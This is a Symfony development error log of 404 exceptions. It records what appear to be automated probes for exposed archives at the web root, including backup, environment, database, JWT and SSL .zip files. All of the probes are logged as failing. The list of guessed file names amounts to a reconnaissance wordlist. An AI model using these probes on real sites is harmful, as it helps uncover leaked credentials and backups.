  7644. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cfg.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cfg.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7645. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mirror.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mirror.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7646. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /control_panel.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /control_panel.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7647. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mariadb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mariadb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7648. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dev.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dev.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7649. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /prototype.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /prototype.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7650. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /vendor.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /vendor.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7651. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /whm.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /whm.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7652. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backups.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backups.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7653. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /elasticsearch.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /elasticsearch.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7654. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /testing.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /testing.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7655. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongo.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongo.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7656. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /lib.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /lib.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7657. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_yearly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_yearly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7658. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /code.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /code.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7659. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /release-candidate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /release-candidate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7660. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7661. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /tmp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /tmp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7662. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /preferences.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /preferences.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7663. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /options.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /options.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7664. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /toml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /toml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7665. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /scripts.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /scripts.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7666. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7667. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7668. [2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /management.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /management.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7669. [2025-12-20 18:31:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /yarn.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /yarn.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7670. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mercurial.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mercurial.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7671. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /plesk.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /plesk.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7672. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /auth.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /auth.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7673. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /environment.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /environment.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7674. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpmyadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpmyadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7675. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /adminer.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /adminer.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7676. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /jwt.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /jwt.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7677. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_weekly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_weekly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7678. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrators.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrators.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7679. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /siteground.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /siteground.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7680. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongodb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongodb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7681. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_2.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_2.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7682. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ssl.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ssl.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7683. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /oauth.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /oauth.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7684. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /redis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /redis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7685. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /oracle.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /oracle.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7686. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_1.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_1.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
